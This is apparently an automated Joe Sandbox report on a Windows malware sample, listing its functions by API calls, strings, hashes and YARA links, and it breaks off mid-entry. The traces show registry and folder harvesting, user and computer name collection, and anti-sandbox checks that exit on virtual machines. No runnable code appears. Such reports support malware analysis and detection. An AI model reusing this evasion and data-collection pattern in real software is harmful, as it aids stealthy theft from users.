Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: 7d4500fa2934594752666061c9df31e8c65c16c470467cd37b1ac9dbbd13c62c
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,04086448,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,040866A0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,04086958,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,040866E8,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,040873A8), ref: 00411E2B

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,0406ADE0), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,0406AD80), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,0406ADB0), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,0406AA68), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083720), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04082AC0), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04068308), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04068028), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083738), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083768), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083780), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083750), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04068188), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,040836C0), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04083828,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04082BB0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,04082BB0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1175201934-0
Opcode ID: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,04086790), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,04066698), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,04086EB8), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 6C20C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C20C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C20C969
GetSystemInfo.KERNEL32(?), ref: 6C20C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C20C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C20C9E2

Memory Dump Source

Source File: 0000000A.00000002.1716177431.000000006C1F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 6C1F0000, based on PE: true

Associated: 0000000A.00000002.1716123546.000000006C1F0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000000A.00000002.1716499748.000000006C27E000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000000A.00000002.1716526775.000000006C282000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c1f0000_u48o.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 4a349bf811791671993b2cba4947ee45dd4d51a6f0a86ee2941d7d0ac9c7e9c1
Instruction ID: ad63e7c6acfe7e3d6f3504f690f4a436c7ce87dc198da4d38c54f38ed3b2c044
Opcode Fuzzy Hash: 4a349bf811791671993b2cba4947ee45dd4d51a6f0a86ee2941d7d0ac9c7e9c1
Instruction Fuzzy Hash: 6321C87174562C6BDB05AA24C8C8BBE7279AB46B04F50052AFD03A7A80DB605840C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,04083A28), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,04067288,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,04086D38,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,040673D8,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,040863D0,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(040837F8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(04086F98,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(040837F8,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-2812842227
Opcode ID: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

